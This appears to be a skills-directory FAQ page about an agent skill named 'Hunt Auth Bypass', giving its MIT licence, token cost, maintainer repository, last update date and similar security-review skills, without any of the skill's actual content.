Hunt Auth Bypass is published under the MIT licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Hunt Auth Bypass use?

About 6.6k tokens (SKILL.md is roughly 27k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 2k tokens, read only when the agent opens those files.

What are the alternatives to Hunt Auth Bypass?

Skills that share tags, products or a category with Hunt Auth Bypass: Security Review (doorkeeper-gem/doorkeeper, 5.5k stars), Project Security (johnku2011/boilerplates-with-ai-skills, 240 stars), Ton Vulnerability Scanner (trailofbits/skills, 7.5k stars) and Sast JWT (utkusen/sast-skills, 1.3k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Hunt Auth Bypass?

sickn33 (a GitHub user) maintains it in sickn33/agentic-awesome-skills, which has 47,405 GitHub stars. The repository holds 1,497 skills in this directory. The repository was last updated on October 9, 2026.

Source: sickn33/agentic-awesome-skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.